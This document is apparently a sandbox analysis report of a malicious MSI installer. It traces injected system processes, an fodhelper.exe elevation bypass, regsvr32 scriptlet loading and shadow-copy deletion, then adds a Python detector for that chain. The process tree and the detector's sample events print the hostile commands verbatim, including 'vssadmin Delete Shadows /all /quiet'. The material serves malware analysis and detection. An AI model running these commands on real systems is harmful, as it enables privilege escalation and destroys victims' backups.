Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\NumMethods\ = "4" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC}\VersionIndependentProgID | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\Elevation | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\Software\Classes\AppID\{1FCBE96C-1697-43AF-9140-2897C7C69767} | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\ | setup.exe
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
msiexec.exe, MsiExec.exe, msedge.exe, msedge.exe, identity_helper.exe, msedge.exe, MicrosoftEdgeUpdate.exe (6 instances)
pid | process | entries
4628 | msiexec.exe | 2
2364 | MsiExec.exe | 2
4980 | msedge.exe | 2
3124 | msedge.exe | 2
3512 | identity_helper.exe | 2
5480 | msedge.exe | 4
6000 | MicrosoftEdgeUpdate.exe | 6
5256 | MicrosoftEdgeUpdate.exe | 4
1852 | MicrosoftEdgeUpdate.exe | 2
464 | MicrosoftEdgeUpdate.exe | 2
3108 | MicrosoftEdgeUpdate.exe | 4
3172 | MicrosoftEdgeUpdate.exe | 2
-
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MsiExec.exe
pid | process | entries
2364 | MsiExec.exe | 3
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exe
pid | process | entries
3124 | msedge.exe | 5
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exe, msiexec.exe, vssvc.exe
description | pid | process
Token: SeShutdownPrivilege | 5112 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 5112 | msiexec.exe
Token: SeSecurityPrivilege | 4628 | msiexec.exe
Token: SeCreateTokenPrivilege | 5112 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 5112 | msiexec.exe
Token: SeLockMemoryPrivilege | 5112 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 5112 | msiexec.exe
Token: SeMachineAccountPrivilege | 5112 | msiexec.exe
Token: SeTcbPrivilege | 5112 | msiexec.exe
Token: SeSecurityPrivilege | 5112 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 5112 | msiexec.exe
Token: SeLoadDriverPrivilege | 5112 | msiexec.exe
Token: SeSystemProfilePrivilege | 5112 | msiexec.exe
Token: SeSystemtimePrivilege | 5112 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 5112 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 5112 | msiexec.exe
Token: SeCreatePagefilePrivilege | 5112 | msiexec.exe
Token: SeCreatePermanentPrivilege | 5112 | msiexec.exe
Token: SeBackupPrivilege | 5112 | msiexec.exe
Token: SeRestorePrivilege | 5112 | msiexec.exe
Token: SeShutdownPrivilege | 5112 | msiexec.exe
Token: SeDebugPrivilege | 5112 | msiexec.exe
Token: SeAuditPrivilege | 5112 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 5112 | msiexec.exe
Token: SeChangeNotifyPrivilege | 5112 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 5112 | msiexec.exe
Token: SeUndockPrivilege | 5112 | msiexec.exe
Token: SeSyncAgentPrivilege | 5112 | msiexec.exe
Token: SeEnableDelegationPrivilege | 5112 | msiexec.exe
Token: SeManageVolumePrivilege | 5112 | msiexec.exe
Token: SeImpersonatePrivilege | 5112 | msiexec.exe
Token: SeCreateGlobalPrivilege | 5112 | msiexec.exe
Token: SeBackupPrivilege | 4756 | vssvc.exe
Token: SeRestorePrivilege | 4756 | vssvc.exe
Token: SeAuditPrivilege | 4756 | vssvc.exe
Token: SeBackupPrivilege | 4628 | msiexec.exe
Token: SeRestorePrivilege | 4628 | msiexec.exe (15 entries, alternating with the next row)
Token: SeTakeOwnershipPrivilege | 4628 | msiexec.exe (13 entries)
-
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
msiexec.exe, msedge.exe
pid | process | entries
5112 | msiexec.exe | 2
3124 | msedge.exe | 3
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exe, sihost.exe, svchost.exe, taskhostw.exe, MsiExec.exe, cmd.exe, msedge.exe
source pid | source process | target pid | target process | entries
4628 | msiexec.exe | 2220 | srtasks.exe | 2
4628 | msiexec.exe | 2364 | MsiExec.exe | 2
2776 | sihost.exe | 2960 | regsvr32.exe | 2
2800 | svchost.exe | 1728 | regsvr32.exe | 2
2872 | taskhostw.exe | 3728 | regsvr32.exe | 2
2364 | MsiExec.exe | 5076 | cmd.exe | 2
5076 | cmd.exe | 3124 | msedge.exe | 2
3124 | msedge.exe | 4440 | msedge.exe | 2
3124 | msedge.exe | 2076 | msedge.exe | 40
3124 | msedge.exe | 4980 | msedge.exe | 2
3124 | msedge.exe | 1784 | msedge.exe | 6
-
System policy modification 1 TTPs 4 IoCs
Processes:
setup.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | setup.exe
Processes
(tree depth shown as [n]; image path on the first line, command line on the second)

[1] C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
  [2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
  [2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies

[1] C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow

[1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
  [2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
  [2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies

[1] C:\Windows\system32\sihost.exe
    sihost.exe
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
  [2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
  [2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
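The three injected hosts above (taskhostw.exe, svchost.exe -k UnistackSvcGroup -s CDPUserSvc, and sihost.exe; each appears as a WriteProcessMemory source earlier in the report) run the same sequence: regsvr32.exe registers scrobj.dll with /i: pointing at an extension-less file under Users\Public, then cmd /c "start fodhelper.exe" launches fodhelper.exe, which spawns a second regsvr32.exe that runs vssadmin.exe Delete Shadows /all /quiet. fodhelper.exe is an auto-elevating Windows binary that normally spawns nothing, so a child process under it is the point at which the chain acquires the rights needed to delete shadow copies. Most of the rest of the report (the Edge ElevationPolicy and COM class registrations, the MicrosoftEdgeUpdate.exe and setup.exe instances) appears to be Edge's own update and installer activity, triggered when the MsiExec.exe -Embedding child, the process the report tags with "Modifies extensions of user files", opened a microsoft-edge: URL on cryless.info; that registry noise is not payload behaviour and should not be turned into detections.

The following is an added example and not part of the sandbox report: a small Python detector for the chain, run over constructed process-creation events (pid, ppid, image, command line) shaped like the sihost.exe subtree. PIDs 2776 (sihost.exe) and 2960 (its regsvr32.exe) are taken from the report's WriteProcessMemory section; every other PID, and the two benign look-alike events, are made up for the example.

```python
import re

# Constructed events mirroring the report's sihost.exe chain. PIDs 2776 and 2960
# are from the report's WriteProcessMemory section; all other PIDs are invented.
SAMPLE_EVENTS = [
    {"pid": 2776, "ppid": 1000, "image": r"C:\Windows\system32\sihost.exe",
     "cmdline": "sihost.exe"},
    # first-stage scriptlet, launched directly from the injected host
    {"pid": 2960, "ppid": 2776, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn"},
    # second stage: cmd -> fodhelper (auto-elevate) -> regsvr32 -> vssadmin
    {"pid": 3001, "ppid": 2776, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": 'cmd /c "start fodhelper.exe"'},
    {"pid": 3002, "ppid": 3001, "image": r"C:\Windows\system32\fodhelper.exe",
     "cmdline": "fodhelper.exe"},
    {"pid": 3003, "ppid": 3002, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": '"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb'},
    {"pid": 3004, "ppid": 3003, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": '"C:\\Windows\\System32\\vssadmin.exe" Delete Shadows /all /quiet'},
    # constructed benign look-alikes that must stay quiet
    {"pid": 4100, "ppid": 1000, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\vendor.dll"'},
    {"pid": 4200, "ppid": 1000, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
]

SCRIPTLET_ARG = re.compile(r"/i:(\S+)", re.IGNORECASE)
INJECTED_HOSTS = {"sihost.exe", "taskhostw.exe", "svchost.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def regsvr32_scriptlet(ev, by_pid):
    """regsvr32 registering scrobj.dll with /i: aimed at a scriptlet it should not run."""
    if basename(ev["image"]) != "regsvr32.exe" or "scrobj.dll" not in ev["cmdline"].lower():
        return None
    m = SCRIPTLET_ARG.search(ev["cmdline"])
    if not m:
        return None
    target = m.group(1).strip('"').replace("\\", "/")
    # The report's targets are extension-less files reached by ../ traversal into
    # Users\Public; a vendor scriptlet has an extension and an absolute install path.
    if "." not in target.rsplit("/", 1)[-1] or "/users/public/" in target.lower():
        return "scrobj.dll scriptlet from " + target
    return None


def fodhelper_child(ev, by_pid):
    """fodhelper.exe auto-elevates and spawns nothing on its own; any child is suspect."""
    parent = by_pid.get(ev["ppid"])
    if parent and basename(parent["image"]) == "fodhelper.exe":
        return "fodhelper.exe spawned " + basename(ev["image"])
    return None


def shadow_delete(ev, by_pid):
    cl = ev["cmdline"].lower()
    if basename(ev["image"]) == "vssadmin.exe" and "delete" in cl and "shadows" in cl:
        return "vssadmin deleting shadow copies"
    return None


def injected_host(ev, by_pid):
    """Shell-hosting system processes (WriteProcessMemory sources in the report)
    launching the loader stage; a plain svchost -> cmd is deliberately left alone."""
    parent = by_pid.get(ev["ppid"])
    if not parent or basename(parent["image"]) not in INJECTED_HOSTS:
        return None
    child = basename(ev["image"])
    if child == "regsvr32.exe" or (child == "cmd.exe" and "fodhelper" in ev["cmdline"].lower()):
        return basename(parent["image"]) + " spawned " + child
    return None


def ancestry(pid, by_pid):
    """Image names from pid up to the root; stops at an unknown or cyclic ppid."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names


def elevated_shadow_chain(ev, by_pid):
    """High confidence: shadow deletion with fodhelper and regsvr32 among its ancestors."""
    if shadow_delete(ev, by_pid) is None:
        return None
    names = ancestry(ev["ppid"], by_pid)
    if "fodhelper.exe" in names and "regsvr32.exe" in names:
        return "shadow deletion via " + " <- ".join(names)
    return None


RULES = (regsvr32_scriptlet, fodhelper_child, shadow_delete, injected_host, elevated_shadow_chain)


def detect(events):
    """Map each rule name to the sorted PIDs it fired on."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for ev in events:
        for rule in RULES:
            if rule(ev, by_pid):
                hits.setdefault(rule.__name__, []).append(ev["pid"])
    return {name: sorted(pids) for name, pids in hits.items()}


if __name__ == "__main__":
    for name, pids in detect(SAMPLE_EVENTS).items():
        print(f"{name:23s} {pids}")
```

The per-event rules are each cheap enough to run on a process-creation feed on their own, but the one worth paging on is elevated_shadow_chain: it only fires when the shadow deletion sits below both fodhelper.exe and regsvr32.exe, which is the combination this report shows and which Edge's own installer activity never produces. On the constructed events it reports PID 3004 with the ancestry regsvr32.exe <- fodhelper.exe <- cmd.exe <- sihost.exe, while the vendor DLL registration and the "vssadmin list shadows" look-alikes stay silent.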
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
  C:\Windows\system32\srtasks.exe
    Command: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

  C:\Windows\System32\MsiExec.exe
    Command: C:\Windows\System32\MsiExec.exe -Embedding 07A44DD5F6E1FC79B82242F6378E9915
    - Modifies extensions of user files
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe
      Command: cmd /c "start microsoft-edge:http://30ccb26874meemybio.cryless.info/meemybio^&1^&39353836^&68^&375^&2219041
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://30ccb26874meemybio.cryless.info/meemybio&1&39353836&68&375&2219041
        - Adds Run key to start application
        - Enumerates system info in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9ac1946f8,0x7ff9ac194708,0x7ff9ac194718

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
          - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5168 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4028 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

          C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
            Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff64f125460,0x7ff64f125470,0x7ff64f125480

        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
          - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1044 /prefetch:2
          - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1044 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5796 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7020 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5564 /prefetch:8

C:\Windows\system32\vssvc.exe
  Command: C:\Windows\system32\vssvc.exe
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
  - Checks SCSI registry key(s)

C:\Windows\System32\CompPkgSrv.exe
  Command: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe
  Command: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
  Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"

  C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\msedgerecovery.exe
    Command: "C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\msedgerecovery.exe" --appguid={56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} --browser-version=92.0.902.67 --sessionid={8f68ca89-0da3-4b73-bb5e-2999c6c63746} --system
    - Executes dropped EXE

    C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\MicrosoftEdgeUpdateSetup.exe
      Command: "C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\MicrosoftEdgeUpdateSetup.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent
      - Executes dropped EXE
      - Drops file in Program Files directory

      C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\MicrosoftEdgeUpdate.exe
